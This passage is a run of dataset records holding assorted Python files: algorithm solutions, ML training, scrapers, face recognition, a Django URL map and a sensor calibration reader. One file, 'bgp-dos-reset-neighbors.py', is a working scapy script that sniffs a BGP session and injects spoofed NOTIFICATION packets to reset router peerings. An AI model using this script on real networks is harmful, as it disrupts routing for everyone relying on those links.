''.join([y[0]]*(len(x)-len(y)))\n\t\t\t\tif x+z == z+x:\n\t\t\t\t\treturn -cmp(x+y, y+x)\n\t\t\t\treturn -cmp(x, z)\n\t\t\telif y.startswith(x):\n\t\t\t\tz = x + ''.join([x[0]]*(len(y)-len(x)))\n\t\t\t\tif y+z == z+y:\n\t\t\t\t\treturn -cmp(x+y, y+x)\n\t\t\t\treturn -cmp(z, y)\n\t\t\telse:\n\t\t\t\treturn -cmp(x, y)\n\t\tl = sorted(map(str, nums), cmp=lambda x, y: compare(x, y))\t\t\n\t\tresult = ''.join(l)\n\t\tif result.strip('0') == '':\n\t\t\treturn \"0\"\n\t\treturn result\n","sub_path":"LeetCode/Solved/oj179.py","file_name":"oj179.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"423396729","text":"#!/usr/bin/env python3\n#Import time so we can set a sleep timer\nimport time\n#Import scapy\nfrom scapy.all import *\n#Import BGP\nload_contrib('bgp')\n\n#Loop to sniff packets\nfor i in range (0, 5):\n #Sniff for a BGP packet - change IP address to the right IP address\n pkt = sniff(filter=\"tcp and ip dst 192.168.1.249\",count=1)\n\n for i in range (0, 10):\n #Create a new Ethernet frame\n frame1=Ether()\n #Set destination MAC address to captured BGP frame\n frame1.dst = pkt[0].dst\n #Set source MAC address to captured BGP frame\n frame1.src = pkt[0].src\n #Set Ethernet Type to captured BGP frame\n frame1.type = pkt[0].type\n #Set destination port to captured BGP packet TCP port number\n mydport = pkt[0].dport\n #Set source port to captured BGP packet TCP port number\n mysport = pkt[0].sport\n #Set sequence number to captured BGP packet + i (loop value)\n seq_num = pkt[0].seq + i\n #Set ack number to captured BGP packet \n ack_num = pkt[0].ack\n #Set source IP address to captured BGP packet \n ipsrc = pkt[0][IP].src\n #Set desination IP address to captured BGP packet \n ipdst = pkt[0][IP].dst\n #Craft notification BGP packet. Type 3 is notification. 
Marker is a bunch of F's in hex \n bgp_reset = IP(src=ipsrc, dst=ipdst, ttl=1)\\\n /TCP(dport=mydport, sport=mysport, flags=\"PA\", seq=seq_num, ack=ack_num)\\\n /BGPHeader(marker=340282366920938463463374607431768211455, len=21,\\\n type=3)\n #Send packet into network = frame1 + bgp_reset\n sendp(frame1/bgp_reset)\n frame1.show()\n bgp_reset.show()\n time.sleep(1)\n\n\n","sub_path":"bgp-dos-reset-neighbors.py","file_name":"bgp-dos-reset-neighbors.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"131698732","text":"import numpy as np\nfrom skimage.measure import structural_similarity as ssim\n\n\ndef mse(imageA, imageB):\n # the 'Mean Squared Error' between the two images is the\n # sum of the squared difference between the two images;\n # NOTE: the two images must have the same dimension\n err = np.sum((imageA.astype(\"float\") - imageB.astype(\"float\")) ** 2)\n err /= float(imageA.shape[0] * imageA.shape[1])\n err = (err*100)/65025\n # return the MSE, the lower the error, the more \"similar\"\n # the two images are\n return err\n\ndef compare_images(imageA, imageB):\n # compute the mean squared error and structural similarity\n # index for the images\n m = mse(imageA, imageB)\n s = ssim(imageA, imageB)\n\n return round(m,2), round(s,2)","sub_path":"Source/ssim/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613070207","text":"import argparse\nimport numpy as np\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torchvision.datasets import MNIST\nfrom torchvision.transforms import transforms\nfrom torchvision.utils import save_image\n\ntorch.manual_seed(123)\n\nparser = argparse.ArgumentParser(description='PyTorch MNIST AAE')\n\nparser.add_argument('--batch-size', type=int, default=100, metavar='N',\n help='input batch size for training (default: 100)')\nparser.add_argument('--epochs', type=int, default=50, metavar='N',\n help='number of epochs to train (default: 10)')\n\nargs = parser.parse_args()\n\nX_dim = 28 ** 2\nh_dim = 1000\nz_dim = 2\nEPSILON = 1e-15\n\ntrainset = MNIST(root='./data/',\n train=True,\n transform=transforms.ToTensor(),\n download=False)\n\ntestset = MNIST(root='./data/',\n train=False,\n transform=transforms.ToTensor(),\n download=False)\n\ntrain_loader = DataLoader(dataset=trainset,\n batch_size=args.batch_size,\n shuffle=True)\n\ntest_loader = DataLoader(dataset=testset,\n batch_size=args.batch_size,\n shuffle=False)\n\nclass Q_net(nn.Module):\n def __init__(self):\n super(Q_net, self).__init__()\n self.lin1 = nn.Linear(X_dim, h_dim)\n self.lin2 = nn.Linear(h_dim, h_dim)\n self.lin3gauss = nn.Linear(h_dim, z_dim)\n def forward(self, x):\n x = F.dropout(self.lin1(x), p=0.25, training=self.training)\n x = F.relu(x)\n x = F.dropout(self.lin2(x), p=0.25, training=self.training)\n x = F.relu(x)\n xgauss = self.lin3gauss(x)\n return xgauss\n\nclass P_net(nn.Module):\n def __init__(self):\n super(P_net, self).__init__()\n self.lin1 = nn.Linear(z_dim, h_dim)\n self.lin2 = nn.Linear(h_dim, h_dim)\n self.lin3 = nn.Linear(h_dim, X_dim)\n def forward(self, x):\n x = self.lin1(x)\n x = F.dropout(x, p=0.25, training=self.training)\n x = F.relu(x)\n x = self.lin2(x)\n x = F.dropout(x, p=0.25, 
training=self.training)\n x = self.lin3(x)\n return F.sigmoid(x)\n\nclass D_net(nn.Module):\n def __init__(self):\n super(D_net, self).__init__()\n self.lin1 = nn.Linear(z_dim, h_dim)\n self.lin2 = nn.Linear(h_dim, h_dim)\n self.lin3 = nn.Linear(h_dim, 1)\n def forward(self, x):\n x = F.dropout(self.lin1(x), p=0.2, training=self.training)\n x = F.relu(x)\n x = F.dropout(self.lin2(x), p=0.2, training=self.training)\n x = F.relu(x)\n return F.sigmoid(self.lin3(x))\n\nQ, P, D = Q_net(), P_net(), D_net()\nQ.train()\nP.train()\nD.train()\n\n# Optimizers\nP_optim = optim.Adam(P.parameters(), lr = 0.001)\nQ_enc_optim = optim.Adam(Q.parameters(), lr = 0.001)\nQ_gen_optim = optim.Adam(Q.parameters(), lr = 0.001)\nD_optim = optim.Adam(D.parameters(), lr = 0.001)\n\nfor epoch in range(args.epochs):\n step = 0\n for i, (images, _) in enumerate(train_loader):\n P.zero_grad()\n Q.zero_grad()\n D.zero_grad()\n\n images = Variable(images)\n batch_size = images.size()[0]\n images = images.view(batch_size, -1)\n\n z_sample = Q(images)\n x_sample = P(z_sample)\n recon_loss = F.binary_cross_entropy(x_sample + EPSILON, images + EPSILON)\n recon_loss.backward()\n\n P_optim.step()\n Q_enc_optim.step()\n\n Q.eval()\n z_real_gauss = Variable(torch.randn(images.size()[0], z_dim) * 5.)\n D_real_gauss = D(z_real_gauss)\n\n z_fake_gauss = Q(images)\n D_fake_gauss = D(z_fake_gauss)\n\n D_loss = -torch.mean(torch.log(D_real_gauss + EPSILON) + torch.log(1 - D_fake_gauss + EPSILON))\n D_loss.backward()\n D_optim.step()\n\n Q.train()\n z_fake_gauss = Q(images)\n D_fake_gauss = D(z_fake_gauss)\n\n G_loss = -torch.mean(torch.log(D_fake_gauss + EPSILON))\n G_loss.backward()\n Q_gen_optim.step()\n\n step += 1\n\n if (step + 1) % 100 == 0:\n print(\"Epoch: %d, Step: [%d/%d], Reconstruction Loss: %.4f, Discriminator Loss: %.4f, Generator Loss: %.4f\" %\n (epoch + 1, step + 1, len(train_loader), recon_loss.data[0], D_loss.data[0], G_loss.data[0]))\n\n P.eval()\n z1 = np.arange(-10, 10, 2.).astype('float32')\n z2 = np.arange(-10, 10, 2.).astype('float32')\n nx, ny = len(z1), len(z2)\n recons_image = []\n\n for z1_ in z1:\n for z2_ in z2:\n x = P(Variable(torch.from_numpy(np.asarray([z1_, z2_]))).view(-1, z_dim)).view(1, 1, 28, 28)\n recons_image.append(x)\n\n if not os.path.isdir('./data/reconst_images'):\n os.makedirs('data/reconst_images')\n save_image(recons_image.data, './data/reconst_images/aae_images_%d.png' % (epoch+1), nrow=nx)\n","sub_path":"aae.py","file_name":"aae.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"501093813","text":"import requests\r\n\r\nheaders = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36'} \r\nbase_url = \"http://httpbin.org/get\"\r\nproxies = {\r\n 'http':'socks5://127.0.0.1:1091',\r\n 'https':'socks5://127.0.0.1:1091'\r\n}\r\n\r\ntry:\r\n html = requests.get(base_url,headers=headers,proxies=proxies,timeout=5) # 发送请求\r\n print(html.text)\r\n html.close()#用在请求后面\r\nexcept:\r\n print('不行')\r\n \r\n","sub_path":"05.【反反爬】代理/2.socks5.py","file_name":"2.socks5.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"421617876","text":"import requests\nimport lxml\nfrom bs4 import BeautifulSoup\n\nurl =\"https://www.amazon.com/Instant-Pot-Duo-Evo-Plus/dp/B07W55DDFB/ref=sr_1_1?qid=1597662463\"\n\nheader = {\n \"User-Agent\": 
\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\",\n \"Accept-Language\": \"en-US,en;q=0.9\"\n}\nresponse = requests.get(url, headers=header)\n\nsoup = BeautifulSoup(response.content, \"lxml\")\n\n# print(soup.prettify())\n\nprice = soup.find(id=\"priceblock_ourprice\").get_text()\nprice_without_currency = price.split(\"$\")[1]\nprice_as_float = float(price_without_currency)\nprint(price_as_float)\n\n# To send notification to your email\nimport smtplib\n\ntitle = soup.find(id=\"productTitle\").get_text().strip()\nprint(title)\n\nBUY_PRICE = 200\n\nif price_as_float < BUY_PRICE:\n message = f\"{title} is now {price}\"\n\n with smtplib.SMTP(YOUR_SMTP_ADDRESS, port=587) as connection:\n connection.starttls()\n result = connection.login(YOUR_EMAIL, YOUR_PASSWORD)\n connection.sendmail(\n from_addr=YOUR_EMAIL,\n to_addrs=YOUR_EMAIL,\n msg=f\"Subject:Amazon Price Alert!\\n\\n{message}\\n{url}\"\n )\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"215028130","text":"\"\"\"\nhttps://leetcode.com/explore/challenge/card/june-leetcoding-challenge/541/week-3-june-15th-june-21st/3366/\nThe set [1,2,3,...,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order, we get the following sequence for n = 3:\n\n\"123\"\n\"132\"\n\"213\"\n\"231\"\n\"312\"\n\"321\"\nGiven n and k, return the kth permutation sequence.\n\nNote:\n\nGiven n will be between 1 and 9 inclusive.\nGiven k will be between 1 and n! inclusive.\nExample 1:\n\nInput: n = 3, k = 3\nOutput: \"213\"\nExample 2:\n\nInput: n = 4, k = 9\nOutput: \"2314\"\n\"\"\"\n\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n factorial = [1]\n numbers = [1]\n i = 1\n while i < n:\n numbers.append(i + 1)\n a = factorial.pop(len(factorial) - 1)\n factorial.append(a)\n factorial.append(a * i)\n i += 1\n i = 1\n str_n = 0\n k -= 1\n while i <= n:\n index = int(k / factorial[n - i])\n str_n = 10 * str_n + numbers[index]\n numbers.remove(numbers[index])\n k %= factorial[n - i]\n i += 1\n return str(str_n)\n\n\n# Main Call\nsolution = Solution()\nn = 3\nk = 3\nprint(solution.getPermutation(n, k))\nn = 4\nk = 9\nprint(solution.getPermutation(n, k))\n","sub_path":"src/integers/getPermutation.py","file_name":"getPermutation.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"576128900","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.metrics import matthews_corrcoef, accuracy_score, precision_score, recall_score, roc_auc_score, average_precision_score\nfrom sklearn.metrics import confusion_matrix as sk_conf\nfrom sklearn.metrics import roc_curve as sk_roc_curve\nfrom sklearn.metrics import precision_recall_curve as sk_precrec\n\nfrom statsmodels.tsa.stattools import grangercausalitytests\n\nfrom matplotlib.cm import seismic\n\n\ndef scores(y_true, y_pred, y_prob):\n mcc = matthews_corrcoef(y_true, y_pred)\n acc = accuracy_score(y_true, y_pred)\n\n global_scores = pd.DataFrame({\"matthews\": [mcc],\n \"accuracy\": [acc]\n })\n\n for class_, true_class_, pred_class_, prob_class_ in walk_classes(y_true, y_pred, y_prob):\n tp, fn, fp, tn = sk_conf(true_class_, pred_class_).flatten()\n class_prec = precision_score(true_class_, 
pred_class_)\n class_rec = recall_score(true_class_, pred_class_)\n class_auroc = roc_auc_score(true_class_, prob_class_)\n\n class_scores = pd.DataFrame({f\"class_{class_}_tp\": [tp],\n f\"class_{class_}_fp\": [fp],\n f\"class_{class_}_fn\": [fn],\n f\"class_{class_}_tn\": [tn],\n f\"class_{class_}_precision\": [class_prec],\n f\"class_{class_}_recall\": [class_rec],\n f\"class_{class_}_auroc\": [class_auroc]\n })\n\n global_scores = pd.concat([global_scores, class_scores], axis=1)\n\n return global_scores\n\ndef pr_curve(y_true, y_pred, y_prob, plot=True):\n if plot:\n fig, ax = plt.subplots(figsize=(5, 4))\n ax.set_title(\"PR-curve\")\n ax.set_xlabel(\"recall\")\n ax.set_ylabel(\"precision\")\n\n for class_, true_class_, pred_class_, prob_class_ in walk_classes(y_true, y_pred, y_prob):\n class_prec_, class_rec_, _ = sk_precrec(true_class_, prob_class_)\n\n if plot:\n pos = sum(true_class_) / len(true_class_)\n line, = ax.plot([0,1],[pos, pos], linestyle=\"dotted\")\n ap = round(average_precision_score(true_class_, prob_class_), 3)\n ax.plot(class_rec_, class_prec_, label=f\"pos label: {class_}; AP: {ap}\", color=line.get_color())\n\n if plot:\n ax.legend(loc=\"lower left\")\n return\n\ndef roc_curve(y_true, y_pred, y_prob, plot=True):\n if plot:\n fig, ax = plt.subplots(figsize=(5,4))\n ax.set_title(\"ROC-curve\")\n ax.set_xlabel(\"false positive rate\")\n ax.set_ylabel(\"true positive rate\")\n ax.plot([0,1],[0,1], label=\"no skill\", color=\"k\", linestyle=\"dotted\")\n\n for class_, true_class_, pred_class_, prob_class_ in walk_classes(y_true, y_pred, y_prob):\n class_fpr_, class_tpr_, _ = sk_roc_curve(true_class_, prob_class_)\n\n if plot:\n auroc = round(roc_auc_score(true_class_, prob_class_), 3)\n ax.plot(class_fpr_, class_tpr_, label=f\"pos label: {class_}; AUROC: {auroc}\")\n\n if plot:\n ax.legend(loc=\"lower right\")\n return\n\ndef walk_classes(y_true, y_pred, y_prob):\n classes = np.unique(y_true).astype(int)\n n_classes = len(classes)\n\n for class_ in classes:\n true_class_ = (y_true == class_).astype(int)\n pred_class_ = (y_pred == class_).astype(int)\n prob_class_ = y_prob[:, class_]\n yield class_, true_class_, pred_class_, prob_class_\n\ndef confusion(y_true, y_pred, plot=True):\n conf = sk_conf(y_true, y_pred, normalize=\"true\")\n\n if plot:\n fig, ax = plt.subplots(figsize=(5, 4))\n sns.heatmap(conf, annot=True, cmap=seismic)\n ax.set_xlabel(\"prediction\")\n ax.set_ylabel(\"true label\")\n\n return conf\n\ndef causality(cause, effect, max_lag=25, sample_frequency=\"5min\", plot=True):\n combined = pd.DataFrame(effect.rename(\"effect\")).join(cause.rename(\"cause\"), how=\"right\")\n if sample_frequency is not None:\n combined = combined.resample(sample_frequency).last().dropna()\n\n cols = [\"ssr_ftest\", \"ssr_chi2test\", \"lrtest\"]\n ret = grangercausalitytests(combined, maxlag=max_lag, verbose=False)\n evaluation = [[ret[lag][0][col][1] for lag in range(1, max_lag + 1)] for col in cols]\n evaluation = pd.DataFrame(data=evaluation, index=cols).T.set_index(np.arange(1, max_lag + 1))\n\n if plot:\n fig, ax = plt.subplots(figsize=(18,5))\n evaluation.plot(ax=ax)\n\n return evaluation, combined\n\n########################################################################################################################\n\n\n\n\n\n\n\n\n","sub_path":"modeling/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"483993183","text":"from random 
import *\nimport string\nfrom time import sleep\nimport os\nimport errno\n\n\n# simple program to write to files randomly to be picked up by Spark Streaming\ndef write_to_file(path, n_lines, max_length):\n with open(path, \"w\") as file:\n for i in range(n_lines):\n rand_string = \"\".join(choice(string.ascii_letters) for _ in range(randint(1, max_length)))\n file.write(rand_string)\n file.write(\"\\n\")\n sleep(random() / 3)\n\n\ndef write_random_files(dir_path, n_files, n_lines, max_length):\n if not os.path.exists(dir_path):\n try:\n os.makedirs(dir_path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n for i in range(n_files):\n write_to_file(dir_path + \"/file_\" + str(i) + \".txt\", n_lines, max_length)\n sleep(random())\n\n\nif __name__ == '__main__':\n write_random_files(\"../dumped-data/watched-files\", 5, 2, 20)\n","sub_path":"utils/write-randomly-to-files.py","file_name":"write-randomly-to-files.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150745800","text":"def reemplaza_primera(cadena):\n \"\"\"\n Reemplaza todas las apariciones de la primer letra de la cadena por ?\n :param cadena: de caracteres\n :return: una nueva cadena producto de aplicar las transformaciones. Si se ingresa\n una cadena vacia , se devuelve una nueva con un solo ?\n \"\"\"\n\n if len(cadena) == 0:\n return '?'\n\n primera = cadena[0].lower()\n aux = ''\n\n for letra in cadena:\n if letra.lower() == primera:\n aux += '?'\n else:\n aux += letra\n\n return aux\n\n\n# ejecucion\ningreso = input(\"ingrese una cadena...\")\ningreso_transformado = reemplaza_primera(ingreso)\nprint(f\"Usted ingresó:\\n {ingreso}\\n Transformada queda como:\\n {ingreso_transformado}\")\n","sub_path":"Parcialitos/Primero/reemplaza_primera.py","file_name":"reemplaza_primera.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567041135","text":"#include \nimport cv2\nimport numpy as np\nfrom PIL import Image\n\noriginal_img = cv2.imread('alph.png')\noriginal_img=original_img[int(len(original_img)/5)*4:int(len(original_img)/5)*5,:]\nB, G, R = cv2.split(original_img) #get the bull channel (because the line is blue)\nimg = original_img\nline=13\n_,cleanBlue = cv2.threshold(B,100,255,cv2.THRESH_BINARY) #get rid of blue line by setting\nridfuzz= cv2.dilate(cleanBlue,None,iterations=1) #erode to get rid of fuzz\nridfuzz2= cv2.erode(ridfuzz,None,iterations=1)\nerode = cv2.erode(ridfuzz2,None,iterations=2) #dialate to fill the gap caused by blue line\ndilated = cv2.dilate(erode,None,iterations=2) #膨胀图像\nres = cv2.resize(dilated,(300*line, 300),\n interpolation = cv2.INTER_CUBIC) ##turn the image into 10*16*16\n #cv2.imshow(\"original_img\", res) #\n#cv2.imshow(\"B_channel_img\", img) #\n#cv2.imshow(\"RidBlue\", cleanBlue) #\n#cv2.imshow(\"ridfuzz2\", ridfuzz2) #\n#cv2.imshow(\"erode\", erode) #\ncv2.imshow(\"Dilated Image\",dilated) #\ncv2.imshow(\"Image\",res) #\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nprint(len(res))\nprint(len(res[0]))\nfor i in range(len(res[0])): #turn the picture binary again\n\tfor j in range(len(res)):\n\t\tif res[j][i]>=100:\n\t\t\tres[j][i]=255\n\t\telse:\n\t\t\tres[j][i]=0\nprint(res)\nprint(res[10])\nline=13\nfor i in range(line):\n\ta=res[:,int(len(res[0])/line)*i:int(len(res[0])/line)*(i+1)]\n\tname=str(i+line*4) + 
\".png\"\n\tcv2.imwrite(name,a)","sub_path":"assignment2/bigpic/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"244608010","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('location//', views.location, name='place'),\n path('character//', views.character, name='character'),\n path('episode//', views.episode, name='episode'),\n path('location/', views.not_found, name='not_found'),\n path('search/', views.search, name='search'),\n]","sub_path":"Tarea1_API/ram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"377755973","text":"\"\"\"\nreferences : https://www.cs.cmu.edu/~rsalakhu/papers/oneshot1.pdf\n\"\"\"\nfrom keras.models import load_model\n\n# model = load_model(\"C:/Users/phani/Downloads/Colab Archive/siamese_net_bce.h5\", compile=False)\nmodel = load_model(\"C:/Users/phani/Downloads/siamese_net_bce_v2.h5\", compile=False)\n\n\nimport os\nimport face_recognition\nimport cv2\nimport numpy as np\nimport pickle\n\nKNOWN_FACES_DIR = \"known_faces\" \nUNKNOWN_FACES_DIR = \"unknown_faces\"\nFRAME_THICKNESS = 3\nFONT_THICKNESS = 2\nMODEL = \"hog\" #cnn\nIMAGE_SIZE = 96\n\ndef zscore(x):\n\tmean = np.mean(x)\n\tstd = np.std(x)\n\tstd_adj = np.maximum(std, 1.0 / np.sqrt(x.size))\n\ty = np.multiply(np.subtract(x, mean), 1 / std_adj)\n\treturn y\n\n# print(\"fetching encodings and labels\")\n\n# pickle_in1 = open(\"encodings/known_faces.pickle\",\"rb\")\n# known_faces = pickle.load(pickle_in1)\n\n# pickle_in2 = open(\"encodings/known_names.pickle\",\"rb\")\n# known_names = pickle.load(pickle_in2)\n\nprint(\"fetching encodings and labels\")\n\npickle_in1 = open(\"encodings/known_faces2.pickle\",\"rb\")\nknown_faces = pickle.load(pickle_in1)\n\npickle_in2 = open(\"encodings/known_names2.pickle\",\"rb\")\nknown_names = pickle.load(pickle_in2)\n\n\nprint(\"processing Video\")\n#test_video, VID_20200318_092439, excelsior, L_P, BBT2, *VID_20200322_120551, VID_20200322_115721\nvideo = cv2.VideoCapture('test_videos/test_video.mp4')\ncount = 0\nwhile True:\n\tret, image = video.read()\n\timage = cv2.resize(image, (640, 360))\n\n\tif not ret:\n\t\tbreak\n\n\tlocations = face_recognition.face_locations(image, model=MODEL)\n\tencodings = []\n\tfor top, right, bottom, left in locations:\n\t\timg = cv2.resize(np.array(image[top:bottom ,left:right]),(IMAGE_SIZE, IMAGE_SIZE))\n\t\timg = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\t\timg = np.expand_dims(img, axis=0)\n\t\timg = np.expand_dims(img, axis=-1)\n\t\tencodings.append(model.predict(zscore(img)))\n\t\n\tfor face_encoding, face_location in zip(encodings, locations):\n\t\tresults = [np.sqrt(np.sum(np.square(known_faces[i]-face_encoding))) for i in range(len(known_faces))]\n\t\tmatch = known_names[results.index(min(results))]\n\t\tprint(f\"Match found: {match},{min(results)}\")\n\t\t# top_left = (face_location[3], face_location[0])\n\t\t# bottom_right = (face_location[1], face_location[2])\n\t\tcolor = [0, 255, 0]\n\t\t# cv2.rectangle(image, top_left, bottom_right, color, FRAME_THICKNESS)\n\t\ttop_left = (face_location[3], face_location[2])\n\t\tbottom_right = (face_location[1], face_location[2]+22)\n\t\tif min(results) < 15:\t\t\t\t\n\t\t\tcv2.rectangle(image, top_left, bottom_right, color, cv2.FILLED)\n\t\t\tcv2.putText(image, match, 
(face_location[3]+10, face_location[2]+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), FONT_THICKNESS)\n\tcount += 5\n\tvideo.set(1, count)\n\tcv2.imshow(\"TV\", image)\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\ncv2.destroyAllWindows()","sub_path":"face_recognition_bce_video.py","file_name":"face_recognition_bce_video.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"174046922","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\n\n\nclass Webtoon:\n \"\"\"\n method 1개\n 기본정보\n \"\"\"\n def __init__(self):\n self.name = None\n self.webtoon_id = None\n self.title = None\n self.author = None\n self.description = None\n self.get_url = None\n\n def get_url(self):\n file_path = 'data/webtoon_page.html'\n webtoon_page_url = 'http://comic.naver.com/webtoon/list.nhn?'\n params = {\n 'titleId': self.webtoon_id\n }\n\n if os.path.exists(file_path):\n html = open(file_path, 'rt').read()\n else:\n response = requests.get(webtoon_page_url, params)\n html = response.text\n open(file_path, 'wt').write(html)\n return html\n\n def get_info(self):\n soup = BeautifulSoup(self.get_url(), 'lxml')\n h2_title = soup.select_one('div.detail > h2')\n title = h2_title.contents[0].strip()\n author = h2_title.contents[1].get_text(strip=True)\n description = soup.select_one('div.detail > p').get_text(strip=True)\n\n print(title)\n print(author)\n print(description)\n webtoon_info = Episode(\n title=title,\n author=author,\n description=description,\n )\n\n\nclass Episode:\n \"\"\"\n Webtoon에서 인스턴스로 받아와서\n 웹툰명, url\n \"\"\"\n def __init__(self, title, author, description):\n self.title = title\n self.author = author\n self.description = description\n self.url = None\n # 크롤러가 crawler.py에서 입력받은 정보를 받아올수 있게 하자!!\n self.webtoon_id = None\n\n # Webtoon에서 받은 기본 정보와 그리고 이 클라스에서 받게될 정보를 이용해서 하자.\n\n def get_detail_info(self):\n # request를 이용해 정보가 없음 가지고 온다.\n file_path = 'data/webtoonhome.html'\n params = {\n 'titleId': self.webtoon_id\n }\n webtoon_episode_url = 'http://comic.naver.com/webtoon/list.nhn?'\n if os.path.exists(file_path):\n open(file_path, 'rt')\n else:\n response = requests.get(webtoon_episode_url, params)\n html = response.text\n open(file_path, 'wt').write(html)\n # urllib에서 parse를 임포트해와서 합쳐줘서 출력한다.\n url = webtoon_episode_url + parse.urlencode(params)\n\n print(self.title)\n print(self.author)\n print(self.description)\n print(url)\n\n\nclass EpisodeImage:\n \"\"\"\n 에피소드\n url\n file_path 표시\n \"\"\"\n\n\n\nclass Connection:\n def __init__(self, what_user_want):\n self.what_user_want = what_user_want","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"280962674","text":"import sys\nimport csv\nfrom datetime import datetime as dt\nimport json\nimport numpy as np\n\n# Limit display of floats to 8 decimal places and suppress sci notation\nnp.set_printoptions(precision=8, suppress=True)\n\nimport tkinter as tk\nfrom tkinter import filedialog\n\nroot = tk.Tk()\nroot.withdraw()\n\n##\n## Constants\n## =========\nLOWER_WL_LIMIT = 217.0 # constant\nUPPER_WL_LIMIT = 240.0 # constant\n\n##\n## Function definitions\n## ====================\ndef get_user(prompt, response_type):\n \"\"\"\n Bare bones user input validation. 
If string, must not be empty.\n If integer or float, must actually be (or be converted to) that.\n Also handles simple Y or N with defaults.\n\n prompt - Text to display as user prompt\n response_type - str, defaultY, defaultN, int or float\n \"\"\"\n while True:\n response = input(prompt)\n if response_type == \"str\":\n if not response:\n print(\"Whoa! You didn't enter anything.\")\n continue\n elif response_type == \"defaultY\":\n if not response in \"YyNn\":\n print(\"Whoa! That's not a valid answer.\")\n continue\n elif response in \"Yy\":\n return True\n else:\n return False\n elif response_type == \"defaultN\":\n if not response in \"YyNn\":\n print(\"Whoa! That's not a valid answer.\")\n continue\n elif response in \"Nn\":\n return False\n else:\n return True\n elif response_type ==\"int\":\n try:\n response = int(response)\n except ValueError:\n print(\"Whoa! That's not a number.\")\n continue\n elif response_type ==\"float\":\n try:\n response = float(response)\n except ValueError:\n print(\"Whoa! That's not a number.\")\n continue\n return response\n\ndef reader_checks_passed(*args):\n \"\"\"\n Simple tests for successful parsing of cal file.\n\n args - all fields parsed from the input file. First two will be\n srting, rest are lists.\n \"\"\"\n # check if any fields are empty...\n if not all(arg for arg in args):\n return False\n # check if lists are different length...\n if not all(len(arg) == len(args[2]) for arg in args[3:]):\n return False\n # checks passed...\n return True\n \ndef load_cal_file():\n \"\"\"\n Reads a vendor cal file and returns the desired values. Prompts\n user for input file.\n \"\"\"\n wl = [] # wavelength bins\n eno3 = [] # nitrate extinction coefficients\n eswa = [] # seawater extinction coefficients\n di = [] # deionized water reference spectra\n\n cal_temp = \"\"\n\n filedate = \"\"\n\n while True:\n # Prompt user to select the source cal file...\n infile = filedialog.askopenfilename(title=\"Select the instrument calibration file...\")\n if not infile:\n if not get_user(\"Would you like to cancel? Enter Y or [N]... \", \"defaultN\"):\n continue\n else:\n return False\n \n # Open the file and parse out the needed values. If the file\n # format ever changes, or the corrupt, this may do some\n # unexpected things...\n with open(infile, \"r\") as csv_in:\n reader = csv.reader(csv_in)\n # Read file row by row...\n for row in reader:\n # NUTNR cal files may have multiple creation dates in\n # the header. The first one denotes the most recent\n # calibration update, and is the one we want...\n if \"creation time\" in row[1] and not filedate:\n filedate = dt.strptime(row[1][19:], \"%d-%b-%Y %H:%M:%S\")\n # Find the calibration temperature...\n elif row[1].startswith(\"T_CAL_SWA\"):\n cal_temp = row[1][10:].strip()\n # Rows beginning with E contain the values we seek...\n elif row[0] == \"E\":\n wl.append(float(row[1]))\n eno3.append(float(row[2]))\n eswa.append(float(row[3]))\n di.append(float(row[5]))\n\n # Do a few checks on the parsed values...\n if reader_checks_passed(cal_temp, filedate, wl, eno3, eswa, di):\n # Checks passed, return our values...\n return cal_temp, filedate, 